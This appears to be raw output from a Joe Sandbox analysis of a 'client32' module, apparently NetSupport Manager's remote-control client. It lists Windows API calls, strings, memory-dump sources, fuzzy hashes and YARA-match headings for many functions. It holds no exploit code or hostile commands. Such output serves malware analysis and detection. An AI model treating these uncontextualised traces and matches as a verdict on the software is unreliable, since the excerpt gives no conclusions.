                                                                                                                                                                • String ID: "%s%s" %s$nsmexec.exe
                                                                                                                                                                • API String ID: 3894576003-3170401571
                                                                                                                                                                • Opcode ID: 779bfdace7f5841e7d23481dfbcacb01516c4f92a642df6ba432abaa3de3d541
                                                                                                                                                                • Instruction ID: f42932a1cd0d7f5c398cde3da9c5cba293413b1f3726e8dd808e29983910ad54
                                                                                                                                                                • Opcode Fuzzy Hash: 779bfdace7f5841e7d23481dfbcacb01516c4f92a642df6ba432abaa3de3d541
                                                                                                                                                                • Instruction Fuzzy Hash: 38210471D04215EFE701CF55CC81F9AF7A8FB44728F108175E82497640E77AA614CBA2
                                                                                                                                                                APIs
                                                                                                                                                                • GetVersion.KERNEL32(59FD48C0,00000000,00000006,59FD48C0,1117DECB,000000FF,?,11066BE8,NSMWClass,59FD48C0,?,1106EA58), ref: 1103175A
                                                                                                                                                                • __strdup.LIBCMT ref: 110317A5
                                                                                                                                                                  • Part of subcall function 11031660: LoadLibraryA.KERNEL32(Kernel32.dll,59FD48C0,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 11031692
                                                                                                                                                                  • Part of subcall function 11031660: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,1117F5B8,000000FF,?,1103176B), ref: 110316D0
                                                                                                                                                                  • Part of subcall function 11031660: GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 110316DE
                                                                                                                                                                  • Part of subcall function 11031660: FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,1117F5B8,000000FF,?,1103176B), ref: 11031704
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressCurrentFreeLoadProcProcessVersion__strdup
                                                                                                                                                                • String ID: NSMWClass$NSMWClassVista
                                                                                                                                                                • API String ID: 319803333-889775840
                                                                                                                                                                • Opcode ID: 4c9b37b807482a264d938b028bcae5bdead3c3a392ed8a72fe7c5f11a81d2b87
                                                                                                                                                                • Instruction ID: 94daa849741b83d34ebdec6600d8a815dd2e8c1c2b198c9f7830c00fb7d7c227
                                                                                                                                                                • Opcode Fuzzy Hash: 4c9b37b807482a264d938b028bcae5bdead3c3a392ed8a72fe7c5f11a81d2b87
                                                                                                                                                                • Instruction Fuzzy Hash: 5A210576E242895FD712CF3989407AAFBFABF99625F084669E855C7780FB369408C340
                                                                                                                                                                APIs
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,0000000E), ref: 1115FFD1
                                                                                                                                                                  • Part of subcall function 1115FE60: RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?,?), ref: 1115FE98
                                                                                                                                                                  • Part of subcall function 1115FE60: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?), ref: 1115FED9
                                                                                                                                                                  • Part of subcall function 1115FE60: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 1115FEFD
                                                                                                                                                                  • Part of subcall function 1115FE60: RegCloseKey.ADVAPI32(?), ref: 1115FF2A
                                                                                                                                                                • LoadLibraryA.KERNEL32(?,?,?,?,?), ref: 1115FF93
                                                                                                                                                                • LoadLibraryA.KERNEL32(hhctrl.ocx,?,?,?,?), ref: 1115FFA9
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad$AddressCloseEnvironmentExpandOpenProcQueryStringsValue
                                                                                                                                                                • String ID: hhctrl.ocx
                                                                                                                                                                • API String ID: 1060647816-2298675154
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free
                                                                                                                                                                • String ID: Client$DeleteTempUdpFile %s$ImpersonateNetworkDrives
                                                                                                                                                                • API String ID: 269201875-4101313740
                                                                                                                                                                APIs
                                                                                                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B91EF
                                                                                                                                                                • MoveWindow.USER32(8D111939,?,?,?,?,00000001,?,?,?,?,?,?,?,?,?,110BA3F5), ref: 110B9228
                                                                                                                                                                • SetTimer.USER32(8D111939,0000050D,000007D0,00000000), ref: 110B9260
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoMoveParametersSystemTimerWindow
                                                                                                                                                                • String ID: Max
                                                                                                                                                                • API String ID: 1521622399-2772132969
                                                                                                                                                                APIs
                                                                                                                                                                • __itow.LIBCMT ref: 110ED6F2
                                                                                                                                                                  • Part of subcall function 11164459: _xtoa@16.LIBCMT ref: 11164479
                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,00000000,nsdevcon64.exe,11194244,?,?,?,?,?,?,110FF66A), ref: 110ED717
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value__itow_xtoa@16
                                                                                                                                                                • String ID: Error %d setting %s to %s$nsdevcon64.exe
                                                                                                                                                                • API String ID: 293635345-4188669160
                                                                                                                                                                APIs
                                                                                                                                                                • _memset.LIBCMT ref: 1115F4EF
                                                                                                                                                                • GetMenuItemInfoA.USER32(?,00000000,00000001,?), ref: 1115F511
                                                                                                                                                                • TrackPopupMenuEx.USER32(?,?,?,?,00000000,?), ref: 1115F53D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Menu$InfoItemPopupTrack_memset
                                                                                                                                                                • String ID: 0
                                                                                                                                                                • API String ID: 841834121-4108050209
                                                                                                                                                                APIs
                                                                                                                                                                • IsWindow.USER32(?), ref: 110ED118
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                                                                                                                • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                                                                                                                • API String ID: 2577986331-1331251348
                                                                                                                                                                • Opcode ID: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
                                                                                                                                                                • Instruction ID: a6e56e2616b3f757a7bedb7841b960acd04ffc41865bfa7298ab7df9715bb4c1
                                                                                                                                                                • Opcode Fuzzy Hash: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
                                                                                                                                                                • Instruction Fuzzy Hash: 85F02735F02126BBC6228E579C09F8EB378CF90BACF0200A4F81C26140E734B51082D5
                                                                                                                                                                APIs
                                                                                                                                                                • _free.LIBCMT ref: 11081417
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorExitLastMessageProcess_freewsprintf
                                                                                                                                                                • String ID: ..\CTL32\DataStream.cpp$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                                                                                • API String ID: 2441568934-1875806619
                                                                                                                                                                • Opcode ID: af1373b32a9bb4e1f8f26d5d02c3c702896290850c3687507677e6fe67b99708
                                                                                                                                                                • Instruction ID: 32575625ee732fca108261b890e952c9fd6c17214e61566243eaf6e55242290c
                                                                                                                                                                • Opcode Fuzzy Hash: af1373b32a9bb4e1f8f26d5d02c3c702896290850c3687507677e6fe67b99708
                                                                                                                                                                • Instruction Fuzzy Hash: D1F0A0BCE086651BD730DE99BC00FCAB7D05F1434CF050498EA8627682DBBA7549C2E6
                                                                                                                                                                APIs
                                                                                                                                                                • GetDeviceCaps.GDI32(?,0000000E), ref: 110EF7B2
                                                                                                                                                                • GetDeviceCaps.GDI32(?,0000000C), ref: 110EF7B9
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CapsDevice$ErrorExitLastMessageProcesswsprintf
                                                                                                                                                                • String ID: ..\CTL32\pcibmp.cpp$nColors
                                                                                                                                                                • API String ID: 2713834284-4292231205
                                                                                                                                                                • Opcode ID: 75b71cda2beea52cdebbc6f16cffef0c1e21f92a9f099c593304bde246b07ca1
                                                                                                                                                                • Instruction ID: e653e105d1db285baf4aee81a270448f5a93b4716bd0762641d67f3d6a1cba1b
                                                                                                                                                                • Opcode Fuzzy Hash: 75b71cda2beea52cdebbc6f16cffef0c1e21f92a9f099c593304bde246b07ca1
                                                                                                                                                                • Instruction Fuzzy Hash: 3CE0D827F4123837F60125FA6C81F86F78C9B857A8F020072FA14BB281D5D16C0046D1
                                                                                                                                                                APIs
                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                                                                                                • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                                                                                                • RegEnumValueA.ADVAPI32(?,00000001,?,00000080,00000000,?,?,00000480), ref: 110612C3
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 110612D4
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnumValue$CloseOpen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3785232357-0
                                                                                                                                                                • Opcode ID: 7715bebcec98b19269c8f2ceb66aa64331a88d71416ba02ead887a332bffef31
                                                                                                                                                                • Instruction ID: e119b506798adee895546c353bca4cd72f80153627c59e78ac85c5ed933e93b3
                                                                                                                                                                • Opcode Fuzzy Hash: 7715bebcec98b19269c8f2ceb66aa64331a88d71416ba02ead887a332bffef31
                                                                                                                                                                • Instruction Fuzzy Hash: 14412CB190061E9EDB20CB54CC84FDBBBBDAB89305F0045D9E649D7141EA70AA98CFA0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 11035847
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1103585C
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 1103586B
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 11035880
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Exception@8Throwstd::exception::exception$_malloc_memsetwsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1651403513-0
                                                                                                                                                                APIs
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00001000,11027030,00000000,00000000,111ED468), ref: 110291F3
                                                                                                                                                                • Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029212
                                                                                                                                                                • PostThreadMessageA.USER32(00000000,00000500,00000000,00000000), ref: 11029234
                                                                                                                                                                • Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 1102923C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: SleepThread$CreateMessagePost
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3347742789-0
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(0000002C,59FD48C0,?,?,00000000,00000000,?,Function_00182078,000000FF,?,1103D500,?,?,?,00000000,59FD48C0), ref: 110B325F
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,1103D500,?,?,?,00000000,59FD48C0,?,?,00000000,?,00000015,00000000), ref: 110B329F
                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 110B331A
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(0000002C), ref: 110B3321
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Leave$EnterEvent
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3394196147-0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,1105D780,00000001,00000000), ref: 1103F503
                                                                                                                                                                  • Part of subcall function 1105C9E0: EnterCriticalSection.KERNEL32(00000000,?,?,?,?,1103F515,?,?,Client,DisableThumbnail,00000000,00000000,Client,DisableWatch,00000000,00000000), ref: 1105C9FE
                                                                                                                                                                  • Part of subcall function 1105C9E0: LeaveCriticalSection.KERNEL32(00000000,?,DisableWatch,00000000,00000000,59FD48C0), ref: 1105CA7E
                                                                                                                                                                  • Part of subcall function 1105C9E0: SetEvent.KERNEL32(?,?,DisableWatch,00000000,00000000,59FD48C0), ref: 1105CA88
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$CloseEnterEventHandleLeave__wcstoi64
                                                                                                                                                                • String ID: Client$DisableThumbnail$DisableWatch
                                                                                                                                                                • API String ID: 2471723077-3419801620
                                                                                                                                                                APIs
                                                                                                                                                                • _memset.LIBCMT ref: 110395F6
                                                                                                                                                                  • Part of subcall function 11026830: GetWindowTextA.USER32(?,?,00000100), ref: 11026853
                                                                                                                                                                  • Part of subcall function 11026830: wvsprintfA.USER32(?,?,?), ref: 1102686B
                                                                                                                                                                  • Part of subcall function 11026830: SetWindowTextA.USER32(?,?), ref: 1102687C
                                                                                                                                                                • _strncpy.LIBCMT ref: 11039625
                                                                                                                                                                • SetDlgItemTextA.USER32(?,000003E9,00000000), ref: 1103967E
                                                                                                                                                                • SetDlgItemTextA.USER32(?,0000046C,11194244), ref: 1103968E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Text$ItemWindow$_memset_strncpywvsprintf
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2512952459-0
                                                                                                                                                                APIs
                                                                                                                                                                • EnterCriticalSection.KERNEL32(0000002C,59FD48C0,?,?,00000000,00000000,00000000,Function_00182078,000000FF,?,1103D571,?,59FD48C0,?,?,00000000), ref: 110B336F
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,1103D571,?,59FD48C0,?,?,00000000,?,00000015,00000000), ref: 110B338E
                                                                                                                                                                • SetEvent.KERNEL32(?,?,?,1103D571,?,59FD48C0,?,?,00000000,?,00000015,00000000), ref: 110B33D4
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,?,1103D571,?,59FD48C0,?,?,00000000,?,00000015,00000000), ref: 110B33DB
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Leave$EnterEvent
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3394196147-0
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$_malloc_memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2102557794-0
                                                                                                                                                                APIs
                                                                                                                                                                • SetPropA.USER32(00000000,00000000,00000000), ref: 1115F5BE
                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000FC,1115EFA0), ref: 1115F5CF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LongPropWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2492497586-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 1110F6CE
                                                                                                                                                                • EnterCriticalSection.KERNEL32(00000000,76963760,00000000,111F0590,?,110CD565,00000000,76963760), ref: 1110F6D8
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,7697A1D0,00000000,?,110CD565,00000000,76963760), ref: 1110F6F8
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,7697A1D0,00000000,?,110CD565,00000000,76963760), ref: 1110F70C
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CriticalSection$Leave$CurrentEnterThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2905768538-0
                                                                                                                                                                APIs
                                                                                                                                                                • GetSystemMetrics.USER32(0000004E), ref: 11125618
                                                                                                                                                                • GetSystemMetrics.USER32(0000004F), ref: 1112561F
                                                                                                                                                                • GetSystemMetrics.USER32(00000000), ref: 1112563C
                                                                                                                                                                • GetSystemMetrics.USER32(00000001), ref: 11125649
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MetricsSystem
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4116985748-0
                                                                                                                                                                APIs
                                                                                                                                                                • DestroyWindow.USER32(?,00000000,76963760,110F787A,?,00000104), ref: 11137478
                                                                                                                                                                • GlobalDeleteAtom.KERNEL32 ref: 11137486
                                                                                                                                                                  • Part of subcall function 11112450: FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1111245A
                                                                                                                                                                  • Part of subcall function 11112450: SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 11112470
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 111374BA
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 111374C4
                                                                                                                                                                  • Part of subcall function 11095550: _memset.LIBCMT ref: 1109557F
                                                                                                                                                                  • Part of subcall function 11095550: FreeLibrary.KERNEL32(00000000,?,76974920,111190F7,00000002), ref: 1109558A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Delete$ObjectWindow$AtomDestroyFindFreeGlobalLibraryMessageSend_memset
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 370783926-0
                                                                                                                                                                APIs
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00002710,00000000,033B5C68,1102D6AE), ref: 1109D943
                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 1109D949
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00002710), ref: 1109D958
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 1109D95E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ObjectSingleWait$CloseEventHandle
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1408678129-0
                                                                                                                                                                APIs
                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 11113252
                                                                                                                                                                • SetCursor.USER32(00000000,?,?,11120606,00000000,00000000,11124B99,00000000,00000000,00000000,00000000,View,BlankAll,00000000,00000000,00000004), ref: 11113259
                                                                                                                                                                • DestroyCursor.USER32(?), ref: 11113270
                                                                                                                                                                • DestroyCursor.USER32(?), ref: 1111327D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Cursor$Destroy$Load
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3167891023-0
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountTick$CloseFlush
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2750089244-0
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
